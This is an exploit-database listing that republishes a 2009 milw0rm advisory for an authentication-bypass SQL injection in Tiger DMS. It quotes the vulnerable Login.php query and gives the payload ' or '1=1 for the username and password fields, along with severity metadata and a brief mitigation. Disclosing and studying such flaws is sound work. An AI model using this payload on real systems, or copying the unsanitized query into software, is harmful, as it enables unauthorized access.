header-logo
Suggest Exploit
vendor:
Tiger DMS
by:
milw0rm.com
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Tiger DMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Localhost
2009

Tiger DMS (auth Bypass) SQL Injection Vulnerabilities

A vulnerability exists in Tiger DMS due to improper authentication checks when handling user input. An attacker can exploit this vulnerability to bypass authentication and gain access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in authentication checks.
Source

Exploit-DB raw data:

==============================================================================
DDDDD  OOOO  SSSS      DDDD     ZZZZZZ    TTTTTTTTT EEEEE       A      MM   MM
D    D o  O  S         D   D        Z         T     E          A A     M M M M
D    D o  o  SSSS [**] D    D      Z          T     EEEEE     AAAAA    M  M  M
D   D  o  o     S      D   D      Z           T     E        A     A   M     M
DDDD   oooO  SSSS      DDDD      ZZZZZZ       T     EEEEE   A       A  M     M
==============================================================================
-------------------------------------[+]
Home:http://www.tigerdms.com/download.php
Product: Tiger DMS   
home:www.h4ckf0ru.com
Note:  I test it On Localhost Because ThE Demo is not Worked :)

-------------------------------------
Tiger DMS (auth Bypass) SQL Injection Vulnerabilities
-------------------------------------
File:
-----
Login.php


Vuln:
----
if (isset($r_username)){
$selog = mysql_query("SELECT * FROM $prefix"."users where username='$r_username' and password='$r_password'");
$num_rows = mysql_num_rows($selog);
    if ($num_rows == 1){
    $nona=mysql_fetch_array($selog);
    $_SESSION["aut"] = $nona["type"] ;
    $_SESSION["nick"] = $nona["username"];
    $_SESSION["name"] = $nona["name"];
    $_SESSION["id"] = $nona["id"];
    header("Location: index.php");

exploit:
--------

http://localhost/[path]/login.php

username:' or '1=1

Password:' or '1=1


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu -ViRuS_Dz
And ALL Members Of anti-intruders.org  
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-29]

Navigation

Suggest Exploit

Services By CQR